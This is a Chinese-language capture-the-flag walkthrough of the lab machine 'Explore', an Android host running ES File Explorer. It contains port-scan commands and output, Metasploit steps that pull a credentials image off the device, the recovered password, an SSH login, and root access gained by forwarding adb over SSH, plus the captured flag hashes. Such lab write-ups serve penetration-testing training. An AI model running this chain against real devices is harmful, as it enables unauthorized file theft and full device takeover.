[Meachines] [Easy] Explore Android ES File Explorer+adb权限提升

Information Gathering

IP Address Opening Ports
10.10.10.247 TCP:2222,38637,42135,59777

$ ip='10.10.10.247'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

bash 复制代码
PORT      STATE SERVICE VERSION
2222/tcp  open  ssh     (protocol 2.0)
| ssh-hostkey: 
|_  2048 7190e3a7c95d836634883debb4c788fb (RSA)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
38637/tcp open  unknown
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 25 Feb 2025 13:47:31 GMT
|     Content-Length: 22
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|   GetRequest: 
|     HTTP/1.1 412 Precondition Failed
|     Date: Tue, 25 Feb 2025 13:47:31 GMT
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.0 501 Not Implemented
|     Date: Tue, 25 Feb 2025 13:47:37 GMT
|     Content-Length: 29
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Method not supported: OPTIONS
|   Help: 
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 25 Feb 2025 13:47:57 GMT
|     Content-Length: 26
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: HELP
|   RTSPRequest: 
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 25 Feb 2025 13:47:37 GMT
|     Content-Length: 39
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     valid protocol version: RTSP/1.0
|   SSLSessionReq: 
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 25 Feb 2025 13:47:59 GMT
|     Content-Length: 73
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|     ?G???,???`~?
|     ??{????w????<=?o?
|   TLSSessionReq: 
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 25 Feb 2025 13:48:02 GMT
|     Content-Length: 71
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|     ??random1random2random3random4
|   TerminalServerCookie: 
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 25 Feb 2025 13:47:59 GMT
|     Content-Length: 54
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|_    Cookie: mstshash=nmap
42135/tcp open  http    ES File Explorer Name Response httpd
|_http-server-header: ES Name Response Server
|_http-title: Site doesn't have a title (text/html).
59777/tcp open  http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).

Android ES File Explorer

https://www.exploit-db.com/docs/english/49948-es-file-explorer-file-manager-4.1.9.7.4---paper.pdf

$ msfconsole

msf6 > use auxiliary/scanner/http/es_file_explorer_open_port

msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set RHOSTS 10.10.10.247

msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set action LISTPICS

msf6 auxiliary(scanner/http/es_file_explorer_open_port) > run

msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set action GETFILE

msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set ACTIONITEM /storage/emulated/0/DCIM/creds.jpg

msf6 auxiliary(scanner/http/es_file_explorer_open_port) > run

Kr1sT!5h@Rp3xPl0r3!

$ ssh -oHostKeyAlgorithms=+ssh-rsa kristi@10.10.10.247 -p 2222

User.txt

f32017174c7c7e8f50c6da52891ae250

Privilege Escalation:adb

$ ssh -oHostKeyAlgorithms=+ssh-rsa -L 5555:localhost:5555 kristi@10.10.10.247 -p 2222

$ adb connect 127.0.0.1:5555
$ adb root
$ adb shell

Root.txt

f04fc82b6d49b41c9b08982be59338c5

相关推荐
Elasticsearch6 小时前
Semantic_text 字段默认嵌入模型变为 .jina-embeddings-v5-text-small
elasticsearch
Coffeeee6 小时前
搞Android的怎么可能搞不懂Context Engineering?
android·人工智能·ai编程
Carson带你学Android6 小时前
Gemini Nano 开发实战:让你的App轻松拥有端侧 AI 功能
android·ai编程
解局易否结局7 小时前
鸿蒙原生开发实战:用 Native C++ 与 OpenGL ES 构建高性能图形渲染管线
c++·elasticsearch·华为·harmonyos
TDengine (老段)8 小时前
TDengine SMA 索引 — 块级/文件级统计索引
android·大数据·服务器·数据库·人工智能·时序数据库·tdengine
心中有国也有家8 小时前
AtomGit Flutter 鸿蒙客户端: AnimatedScale 与 AnimatedContainer 联合实战
android·javascript·flutter·华为·harmonyos
恋猫de小郭8 小时前
Flutter Windows 开始支持 Impeller ,还修复了多窗口 bug
android·前端·flutter
枕星而眠9 小时前
Git仓库基础用法
大数据·git·后端·elasticsearch·全文检索
鱼儿也有烦恼10 小时前
07.RecyclerView、SwipeRefreshLayout、SmartRefreshLayout
android
三少爷的鞋10 小时前
Kotlin Flow 深入解析:`stateIn()` 的真正核心,其实是 SharingStarted
android